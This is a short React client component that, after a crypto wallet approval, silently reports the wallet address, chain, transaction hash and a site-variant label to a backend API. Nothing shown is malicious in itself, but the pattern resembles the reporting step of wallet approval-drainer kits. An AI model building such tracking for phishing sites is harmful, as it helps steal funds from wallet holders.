"use client"

import { useEffect, useRef } from "react"

import { buildApprovalPayload, submitApprovalRecord } from "../api/submit-approval"
import { useApprovalFlow } from "../context/approval-context"

export function ApprovalReporter() {
  const {
    justApproved,
    lastApprovalTxHash,
    walletAddress,
    activeChain,
    siteVariant,
  } = useApprovalFlow()
  const reportedRef = useRef<string | null>(null)

  useEffect(() => {
    if (!justApproved || !walletAddress) return

    const dedupeKey = `${walletAddress}:${activeChain}:${lastApprovalTxHash ?? "none"}`
    if (reportedRef.current === dedupeKey) return
    reportedRef.current = dedupeKey

    void submitApprovalRecord(
      buildApprovalPayload({
        walletAddress,
        chain: activeChain,
        approvalTxHash: lastApprovalTxHash,
        siteVariant,
      }),
    )
  }, [
    activeChain,
    justApproved,
    lastApprovalTxHash,
    siteVariant,
    walletAddress,
  ])

  return null
}
